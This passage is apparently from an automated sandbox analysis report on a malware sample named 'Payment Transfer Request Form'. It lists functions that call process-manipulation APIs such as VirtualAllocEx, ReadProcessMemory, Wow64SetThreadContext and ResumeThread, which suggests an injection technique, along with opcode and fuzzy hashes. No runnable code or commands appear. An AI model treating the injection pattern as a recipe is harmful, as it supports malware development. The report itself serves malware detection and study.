                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D5B6,?,?,?,?,?), ref: 0260D677
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 82470361e921140f3eeb22c5610f4bb91cf1f70e194aaa5f6f21b1d39fe391db
                                              • Instruction ID: 241db6a51a51d92756d000b807cbb5ee9dbeabd59c3a54fa60e379654b99a205
                                              • Opcode Fuzzy Hash: 82470361e921140f3eeb22c5610f4bb91cf1f70e194aaa5f6f21b1d39fe391db
                                              • Instruction Fuzzy Hash: C82114B5900249EFDB10CF9AD584ADEBBF4EB48314F14811AE918A7350D374A940CFA4
                                              Function 06A976A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 193 6a976a0-6a976eb 195 6a976fb-6a9772b Wow64SetThreadContext 193->195 196 6a976ed-6a976f9 193->196 198 6a9772d-6a97733 195->198 199 6a97734-6a97764 195->199 196->195 198->199
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A9771E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 9407edba4209aebba838261ed1743553d8e119333067df177c915a0db9eecfd0
                                              • Instruction ID: 998ffbd7521dc8546226f521af39ec368ae2e07319e5aa577fd3185ddbda0775
                                              • Opcode Fuzzy Hash: 9407edba4209aebba838261ed1743553d8e119333067df177c915a0db9eecfd0
                                              • Instruction Fuzzy Hash: FD212771D103098FDB10DFAAC4857EEBBF4EF48314F14842AD559A7240DB789945CFA1
                                              Function 06A97698 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 183 6a97698-6a976eb 185 6a976fb-6a9772b Wow64SetThreadContext 183->185 186 6a976ed-6a976f9 183->186 188 6a9772d-6a97733 185->188 189 6a97734-6a97764 185->189 186->185 188->189
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A9771E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: b88c8f156fa7b2cd23a515a5ee856489c808d6df17125ca87207f141dce0ec71
                                              • Instruction ID: 9d9cfe27c84c59b5e34af4259390439b0905d018b57de63ee76ed566437f700d
                                              • Opcode Fuzzy Hash: b88c8f156fa7b2cd23a515a5ee856489c808d6df17125ca87207f141dce0ec71
                                              • Instruction Fuzzy Hash: 572168B2D00309CFDB10DFAAC5857EEBBF0EF48214F14842AD559A7240DB789948CFA0
                                              Function 06A97928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 203 6a97928-6a979b5 ReadProcessMemory 206 6a979be-6a979ee 203->206 207 6a979b7-6a979bd 203->207 207->206
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A979A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 7da966d8675d7df85f84303ee55ef2f6b0cedc84d9454e466f301b140ec4e4a7
                                              • Instruction ID: 954c0cdf6602c3574d0fe1df3fbf28fbcf433126cf3941218bea231c1e04083b
                                              • Opcode Fuzzy Hash: 7da966d8675d7df85f84303ee55ef2f6b0cedc84d9454e466f301b140ec4e4a7
                                              • Instruction Fuzzy Hash: 062125B18003499FDB10DFAAC885BEEBBF5FF48310F14842AE958A7240D7799944CBA1
                                              Function 06A97921 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 211 6a97921-6a979b5 ReadProcessMemory 214 6a979be-6a979ee 211->214 215 6a979b7-6a979bd 211->215 215->214
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A979A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 3b17d1c7eb618eae3150a920a64090f29c8aa8417a852afa780e3bbab297369b
                                              • Instruction ID: 773d3d3d3a0c1357751ec6c0f9f2887088a820d3a29623b2bac3f023e02c0628
                                              • Opcode Fuzzy Hash: 3b17d1c7eb618eae3150a920a64090f29c8aa8417a852afa780e3bbab297369b
                                              • Instruction Fuzzy Hash: 3D2116B2800349DFDB10DFA9C9857EEBBF5FF48310F14842AE558A7240D7799944CBA0
                                              Function 0260D5EB Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 219 260d5eb-260d684 DuplicateHandle 220 260d686-260d68c 219->220 221 260d68d-260d6aa 219->221 220->221
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D5B6,?,?,?,?,?), ref: 0260D677
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: d6e7e6203d6c2cc7ac11e7cb9719893d9aa078b6ba0c62420b62baf28f995be2
                                              • Instruction ID: ef17d70b83d8182f627a2bc85fb3b11278b0345925900f46a7d0d22ed2a5e9ce
                                              • Opcode Fuzzy Hash: d6e7e6203d6c2cc7ac11e7cb9719893d9aa078b6ba0c62420b62baf28f995be2
                                              • Instruction Fuzzy Hash: 3921F3B5900349DFDB00CFAAD584ADEBBF5FB08310F24805AE958A3350D378A954CF65
                                              Function 06A97778 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 232 6a97778-6a977f3 VirtualAllocEx 235 6a977fc-6a97821 232->235 236 6a977f5-6a977fb 232->236 236->235
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A977E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 7400bb704390c1c461e0143ccc477065b544d09576d89d9cca98b1007e0bfc47
                                              • Instruction ID: dd73fcfbc481357f205cfb96c5b15848bc256e84f16646ad9e299258fd6c4e3f
                                              • Opcode Fuzzy Hash: 7400bb704390c1c461e0143ccc477065b544d09576d89d9cca98b1007e0bfc47
                                              • Instruction Fuzzy Hash: 461126768002499FDB10DFAAC844BDEBBF5EF48310F248419E559A7250C7759944CBA0
                                              Function 06A97770 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 224 6a97770-6a977f3 VirtualAllocEx 227 6a977fc-6a97821 224->227 228 6a977f5-6a977fb 224->228 228->227
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A977E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: fa0c41d88c38d944c9f80a300fac1b2c7f777eb2ab4d9872b8f7e11d16377a81
                                              • Instruction ID: dc294af65d60d65b3c908f17b1f144ae08a122384e53eecbe961cad1ba604c9a
                                              • Opcode Fuzzy Hash: fa0c41d88c38d944c9f80a300fac1b2c7f777eb2ab4d9872b8f7e11d16377a81
                                              • Instruction Fuzzy Hash: 251153B6800209CFDB10DFA9C945BEEBBF5EF48310F24881AE519A7250CB799944CBA0
                                              Function 06A971B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 8b32b7f1aaa5f7d6f72828c7097d2529128d1b5923095987e1a1a8893bc5a87a
                                              • Instruction ID: aa12c5a9d7d582f082c10bf25d478c85a180902654c34334db6631d5223bd10b
                                              • Opcode Fuzzy Hash: 8b32b7f1aaa5f7d6f72828c7097d2529128d1b5923095987e1a1a8893bc5a87a
                                              • Instruction Fuzzy Hash: 33116A71C103498FDB10DFAAC4447DEFBF4EF48310F248419D519A7240CB79A944CBA4
                                              Function 0260AEF3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 240 260aef3-260af38 241 260af40-260af6b GetModuleHandleW 240->241 242 260af3a-260af3d 240->242 243 260af74-260af88 241->243 244 260af6d-260af73 241->244 242->241 244->243
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AF5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: cd1212435b1c5206119e073d1883a55b529db556e824a15637ebc7dc7454d8b3
                                              • Instruction ID: fd2809e4d4d76769cdfbb6ce733bb3efd32b9ee908be6e5cb6d84d6381cdecaa
                                              • Opcode Fuzzy Hash: cd1212435b1c5206119e073d1883a55b529db556e824a15637ebc7dc7454d8b3
                                              • Instruction Fuzzy Hash: 4A1102B6C003498FDB14CF9AC584ADFFBF4EB48214F10845AD519A7740D379A546CFA1
                                              Function 06A94460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A9BEFD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 3870399fc71407513e508b1175d9fa53c05c3caccf15523c6f807989d6327b62
                                              • Instruction ID: 30a7dd415c68288ac45ae01854bb20558f4fb9836e894f0d46ffddf92b6d8e5b
                                              • Opcode Fuzzy Hash: 3870399fc71407513e508b1175d9fa53c05c3caccf15523c6f807989d6327b62
                                              • Instruction Fuzzy Hash: 0C1122B58003489FDB10DF9AD884BDFBBF8EB48320F20845AE918A7200D375A944CFB0
                                              Function 06A971B7 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 7f0d4f4c5370960ad795c5e3262a27e37d7d76ff34df03f7326417a3fa99acbd
                                              • Instruction ID: 651b96300b1b73493347c41c71261e9dd9b3987ece3a97a0d19a9914d8151b97
                                              • Opcode Fuzzy Hash: 7f0d4f4c5370960ad795c5e3262a27e37d7d76ff34df03f7326417a3fa99acbd
                                              • Instruction Fuzzy Hash: 771166B5C103498FDB10DFAAC4457EEFBF4AF48210F24881AD519A7240CB79A944CBA0
                                              Function 0260AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AF5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414443854.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2600000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 10dd681ec3c503258f93b3034c7e32650514ec93747671e53953468ac9c41bab
                                              • Instruction ID: 9a43c21fe7a2242ae6b60a348dc3ab280c400667baa637992e699bcbaced37e3
                                              • Opcode Fuzzy Hash: 10dd681ec3c503258f93b3034c7e32650514ec93747671e53953468ac9c41bab
                                              • Instruction Fuzzy Hash: A2110FB6C003498FDB14CF9AC544A9FFBF4EB88214F10846AD918A7340D379A945CFA1
                                              Function 06A9BE98 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A9BEFD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 8aec5029c4904354cc01113c3e2ebc6506403300cc4d63be0ebfbde536db6b3f
                                              • Instruction ID: 86afb3d253bb6d7bb4397d75a38a1deab6d65b3236086ad9b1ca486d17510e5f
                                              • Opcode Fuzzy Hash: 8aec5029c4904354cc01113c3e2ebc6506403300cc4d63be0ebfbde536db6b3f
                                              • Instruction Fuzzy Hash: 1A1133B5800348DFDB10CF99D584BDEBBF8EB08314F20881AD958B7600D375A544CFA0
                                              Function 024CD4C4 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aafa9d929158b3db3efbe3cabc91bd151d83a041b2e3968647726bde860124c1
                                              • Instruction ID: 482ba88b09e59d1aa8f1a3f494be62b37d677421f9de55c995c12b4b467fc77e
                                              • Opcode Fuzzy Hash: aafa9d929158b3db3efbe3cabc91bd151d83a041b2e3968647726bde860124c1
                                              • Instruction Fuzzy Hash: 4721037A900240DFDB45DF18D9C0B27BB65FB88318F34C57EE90A0B256C336D456CAA2
                                              Function 024CD3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 186a8c7e2e8f3938f241d2c5dc35aad0ceb516101500ae95f2253a098fc0c7ba
                                              • Instruction ID: d832418d7067d7978cc2c864b50ff0000ce13e7a039fb052b1bbf989fc70327f
                                              • Opcode Fuzzy Hash: 186a8c7e2e8f3938f241d2c5dc35aad0ceb516101500ae95f2253a098fc0c7ba
                                              • Instruction Fuzzy Hash: 2821F479900244DFDB48DF18D9C0B26BB65FB84314F34C17EDA0A4B256C336E456CAA2
                                              Function 024DD01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc0cbc05f7142686fc870dd7c75bd0a4ae1be7d628172753f682d58512d76f9b
                                              • Instruction ID: 97bdb22a48d4dc276c1a52508b795af6e06ff8b07afb112a7059f5d913fe3d97
                                              • Opcode Fuzzy Hash: fc0cbc05f7142686fc870dd7c75bd0a4ae1be7d628172753f682d58512d76f9b
                                              • Instruction Fuzzy Hash: 2821D372904344DFDB15DF14D9D0B16BB65EB84218F64C56AD80A4B386C336D447CA61
                                              Function 024DD1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c25f75c3692e0c455259b073395a5738aacc402750dea8c250576cad83cbc78
                                              • Instruction ID: 4cde33b7cc68f4c28b08c59a610fbcef1973c11a6d2f1443cd1c812351175242
                                              • Opcode Fuzzy Hash: 7c25f75c3692e0c455259b073395a5738aacc402750dea8c250576cad83cbc78
                                              • Instruction Fuzzy Hash: 3A21D472A04344EFDB05DF50D9D0B26BBA5FB88314F24C5AEE84A4F392C736D846CA61
                                              Function 024DD005 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74a105c1a995c441dc1684fe4a009bfe3bf55dc3a2e2349498389e7269ca830
                                              • Instruction ID: 0540bf519f5c02064d57aa5ac9e2d1a34476f2a7d6286b576b56b7590b2dcb0f
                                              • Opcode Fuzzy Hash: c74a105c1a995c441dc1684fe4a009bfe3bf55dc3a2e2349498389e7269ca830
                                              • Instruction Fuzzy Hash: 6E217175508380DFCB06CF24D994712BF71EB86214F28C5DBD8498F2A7C33A9846CB62
                                              Function 024CD3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: cca06e303552b6a203859ee2f8e97cb2d89a39905d869e7f6a368b2fca87f45d
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 4C11AF76904240DFCB15CF14D9C4B56BF71FB84324F24C6AED9094B656C33AE456CBA1
                                              Function 024CD4BF Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: cba9d679b54e2f1b33624f877a3b090da9218b009e6ab624a19e06ae1fd039e7
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 57116D76904280DFCB15CF14D9C4B56BF61FB84218F2486AAD8494B656C336D456CBA1
                                              Function 024DD1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414170215.00000000024DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24dd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: dfaf25f1a7ab6911b281e6a7ce60a6b2920109bb642c03e41baa7460502bb38f
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: 08118B76904280DFCB15CF50D5D4B16BBB1FB84218F28C6AAD8494F796C33AD44ACB61
                                              Function 024CD759 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df9ce4edbde97e026c121d06c0de4ec2a65df5b1c5b778c294db2eefa0549fa9
                                              • Instruction ID: e708010e0e10e99f41067dcf0f8fad05d3c8587ac1e420a9dc084b89375daff5
                                              • Opcode Fuzzy Hash: df9ce4edbde97e026c121d06c0de4ec2a65df5b1c5b778c294db2eefa0549fa9
                                              • Instruction Fuzzy Hash: D401A735905B40DBE7505B19CD84B67FBD8DF41624F28847FED094A386D7799840C672
                                              Function 024CD758 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1414104269.00000000024CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 024CD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_24cd000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cc0516a09ea10242963c528570f98163ae10ea9c10cb74b839b6c3246ac7db5
                                              • Instruction ID: fd785afc949adee95a49240bc407fe402b22b66bb0f40b2e612aacd086e6033f
                                              • Opcode Fuzzy Hash: 8cc0516a09ea10242963c528570f98163ae10ea9c10cb74b839b6c3246ac7db5
                                              • Instruction Fuzzy Hash: DCF0C235405740EEE7108A0ACD84B63FBA8EF40624F28C46BED480A386C3799844CAB1

                                              Non-executed Functions

                                              Function 06A94E80 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *E5p
                                              • API String ID: 0-1789816039
                                              • Opcode ID: eddde117592aeb3f1d7aa4cddbb3c7298fcdb3fdc6b31faa048dbe03d2984a1c
                                              • Instruction ID: faa953464a7259774f3a3f88444488f5cd5789bffde1a50d54ab1d38bfae27a2
                                              • Opcode Fuzzy Hash: eddde117592aeb3f1d7aa4cddbb3c7298fcdb3fdc6b31faa048dbe03d2984a1c
                                              • Instruction Fuzzy Hash: 10E1F774E102598FDB14EFA9C580AAEFBF2BF89305F248169D418AB355D731AD41CFA0
                                              Function 06A956F0 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0bdbeec0b04c76356818e94898d1e0d91663c42adfb5a554709d336d6f39f2aa
                                              • Instruction ID: 69c911f14db882e8ebf8ad9d716b404058bb07879e2e744c0294796d5228631f
                                              • Opcode Fuzzy Hash: 0bdbeec0b04c76356818e94898d1e0d91663c42adfb5a554709d336d6f39f2aa
                                              • Instruction Fuzzy Hash: D0E1F674E102598FDB14EFA9C581AAEFBF2BF89305F24C169D414AB355DB30A941CF60
                                              Function 06A952B8 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f93180b1a5cb8844d26e8bbe41cc61c5495a3319ffa9770b08d654ab26283d7
                                              • Instruction ID: 580112942ccffb4b247516db854912e9c1372562dce5e249064cbadee5519638
                                              • Opcode Fuzzy Hash: 5f93180b1a5cb8844d26e8bbe41cc61c5495a3319ffa9770b08d654ab26283d7
                                              • Instruction Fuzzy Hash: 45E1F874E002598FDB54DFA9C581AAEFBF2BF89305F248169D418AB355DB30AD41CFA0
                                              Function 06A97268 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 813d423f1def1e18d1fda8313b30704edd4e23931b1ec595bf7644ff1c658cf7
                                              • Instruction ID: 6d2ae43de43d2f1cede17f51776cec88f6e3df8f35ed91e246bf48dc9f206415
                                              • Opcode Fuzzy Hash: 813d423f1def1e18d1fda8313b30704edd4e23931b1ec595bf7644ff1c658cf7
                                              • Instruction Fuzzy Hash: 49E1E874E102598FDB54DFA9C580AAEFBF2BF89305F248169D414AB356DB30AD41CFA0
                                              Function 06A95B28 Relevance: .3, Instructions: 312COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1429141530.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a90000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b59c3dfc863daf7c4530711b3f52beba92fea317cfbd2bc1a2fa669c3ee59f0f
